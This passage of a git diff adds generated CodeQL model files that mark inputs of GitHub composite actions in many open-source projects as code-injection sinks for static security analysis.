newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml new file mode 100644 index 000000000000..f0636131cdb0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] + - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml new file mode 100644 index 000000000000..4bac281500b9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml new file mode 100644 index 000000000000..3ee27175205f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml new file mode 100644 index 000000000000..37c2873b508b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml new file mode 100644 index 000000000000..231df2a7f879 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-registry-insecure", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-registry-host", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.catalog-source-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.catalog-source-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.image-namespace", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.otlp-collector-image-version", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.otlp-collector-image-name", "code-injection", "generated"] + - ["apache/camel-k", "*", "input.global-operator-namespace", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_camel.model.yml new file mode 100644 index 000000000000..94ba6559838a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] + - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] + - ["apache/camel", "*", "input.distribution", "code-injection", "generated"] + - ["apache/camel", "*", "input.version", "code-injection", "generated"] + - ["apache/camel", "*", "input.pr-id", "code-injection", "generated"] + - ["apache/camel", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_flink.model.yml new file mode 100644 index 000000000000..ab91a71fc0e1 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] + - ["apache/flink", "*", "input.env", "code-injection", "generated"] + - ["apache/flink", "*", "input.target_directory", "code-injection", "generated"] + - ["apache/flink", "*", "input.source_directory", "code-injection", "generated"] + - ["apache/flink", "*", "input.jdk_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml new file mode 100644 index 000000000000..b704cc54b822 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml new file mode 100644 index 000000000000..b438360b5a6a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] + - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] + - ["apache/nuttx", "*", "input.android", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml new file mode 100644 index 000000000000..05b822ebc4d0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] + - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] + - ["apache/opendal", "*", "input.service", "code-injection", "generated"] + - ["apache/opendal", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml new file mode 100644 index 000000000000..de7c35fa1113 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml new file mode 100644 index 000000000000..4ef3ce32bfed --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.secure-access", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.action", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.yamale_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.yamllint_version", "code-injection", "generated"] + - ["apache/pulsar-helm-chart", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/actions/ql/lib/ext/generated/composite-actions/apache_superset.model.yml new file mode 100644 index 000000000000..0efe533073ba --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/actions/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml new file mode 100644 index 000000000000..a472b1be979e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] + - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/actions/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml new file mode 100644 index 000000000000..409c39077866 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] + - ["aptos-labs/aptos-core", "*", "input.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/actions/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml new file mode 100644 index 000000000000..29a0e582ec7e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/actions/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml new file mode 100644 index 000000000000..5d88aaf00174 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/actions/ql/lib/ext/generated/composite-actions/armbian_build.model.yml new file mode 100644 index 000000000000..fe2fb29bfa8c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_release", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_kernel_branch", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_board", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_target", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_branch", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_ui", "code-injection", "generated"] + - ["armbian/build", "*", "input.armbian_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml new file mode 100644 index 000000000000..7107b1dd55d9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.ossr-password", "code-injection", "generated"] + - ["auth0/auth0-java", "*", "input.ossr-username", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml new file mode 100644 index 000000000000..7ecc0cb0e614 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] + - ["auth0/auth0.net", "*", "input.project-paths", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml new file mode 100644 index 000000000000..c75ff3a69140 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/actions/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml new file mode 100644 index 000000000000..ed5dae960604 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.command", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.work-dir", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.job-name", "code-injection", "generated"] + - ["autogluon/autogluon", "*", "input.job-type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/actions/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml new file mode 100644 index 000000000000..a638ceae55ca --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml new file mode 100644 index 000000000000..eb67c35e5f5a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml new file mode 100644 index 000000000000..abfb5157d3bb --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml new file mode 100644 index 000000000000..f0c798160266 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aws/amazon-vpc-cni-k8s", "*", "input.go-package", "code-injection", "generated"] + - ["aws/amazon-vpc-cni-k8s", "*", "input.work-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml b/actions/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml new file mode 100644 index 000000000000..5618781b68d6 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["aws/karpenter-provider-aws", "*", "input.account_id", "code-injection", "generated"] + - ["aws/karpenter-provider-aws", "*", "input.cluster_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml b/actions/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml new file mode 100644 index 000000000000..b1a2d8e4c363 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["awslabs/amazon-eks-ami", "*", "input.max_resource_age_duration", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.aws_region", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.ami_id", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.k8s_version", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.os_distro", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.additional_arguments", "code-injection", "generated"] + - ["awslabs/amazon-eks-ami", "*", "input.build_id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml b/actions/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml new file mode 100644 index 000000000000..f9b39981ab8f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["awslabs/aws-lambda-rust-runtime", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml b/actions/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml new file mode 100644 index 000000000000..1c90c92ca21b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["azerothcore/azerothcore-wotlk", "*", "input.CXX", "code-injection", "generated"] + - ["azerothcore/azerothcore-wotlk", "*", "input.CC", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml b/actions/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml new file mode 100644 index 000000000000..25f194e823a6 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["azure/azure-datafactory", "*", "input.directory", "code-injection", "generated"] + - ["azure/azure-datafactory", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/badges_shields.model.yml b/actions/ql/lib/ext/generated/composite-actions/badges_shields.model.yml new file mode 100644 index 000000000000..2f1481c9c554 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/badges_shields.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["badges/shields", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml b/actions/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml new file mode 100644 index 000000000000..67a1836e8267 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/balena-io_etcher.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["balena-io/etcher", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml b/actions/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml new file mode 100644 index 000000000000..917bd6b03074 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["balena-os/balena-engine", "*", "input.VERBOSE", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml b/actions/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml new file mode 100644 index 000000000000..98190bffee47 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ben-manes/caffeine", "*", "input.attempt-delay", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.attempt-limit", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.arguments", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.graal", "code-injection", "generated"] + - ["ben-manes/caffeine", "*", "input.java", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml b/actions/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml new file mode 100644 index 000000000000..4916ce713d7c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["bokeh/bokeh", "*", "input.test-env", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml b/actions/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml new file mode 100644 index 000000000000..e015387a96db --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/botpress_botpress.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["botpress/botpress", "*", "input.tilt_cmd", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml new file mode 100644 index 000000000000..b9c1ff99ab38 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["braintree/braintree-android-drop-in", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree-android-drop-in", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml new file mode 100644 index 000000000000..e8cde1a082f5 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["braintree/braintree/android", "*", "input.version", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.module", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_file_path", "code-injection", "generated"] + - ["braintree/braintree/android", "*", "input.signing_key_file", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml b/actions/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml new file mode 100644 index 000000000000..1f5bd390369b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["broadinstitute/gatk", "*", "input.identifier", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.repo-path", "code-injection", "generated"] + - ["broadinstitute/gatk", "*", "input.CROMWELL_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml b/actions/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml new file mode 100644 index 000000000000..2097e02a48ae --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/canonical_multipass.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["canonical/multipass", "*", "input.release-tag-re", "code-injection", "generated"] + - ["canonical/multipass", "*", "input.release-branch-re", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml new file mode 100644 index 000000000000..131b59e4f426 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/chia-network_actions.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chia-network/actions", "*", "input.keypair_path", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.role_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.backend_name", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_url", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.ttl", "code-injection", "generated"] + - ["chia-network/actions", "*", "input.vault_token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml b/actions/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml new file mode 100644 index 000000000000..2b6604f4bce7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chia-network/chia-blockchain", "*", "input.command-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml b/actions/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml new file mode 100644 index 000000000000..028fac59db90 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chipsalliance/chisel", "*", "input.version", "code-injection", "generated"] + - ["chipsalliance/chisel", "*", "input.file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml b/actions/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml new file mode 100644 index 000000000000..e188c7fb160c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["chocobozzz/peertube", "*", "input.deployKey", "code-injection", "generated"] + - ["chocobozzz/peertube", "*", "input.knownHosts", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml new file mode 100644 index 000000000000..fe09708380b4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["cilium/cilium-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.binary-dir", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.ci-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.release-version", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.repository", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.go-mod-directory", "code-injection", "generated"] + - ["cilium/cilium-cli", "*", "input.local-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml new file mode 100644 index 000000000000..430d128f1a00 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/cilium_cilium.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - 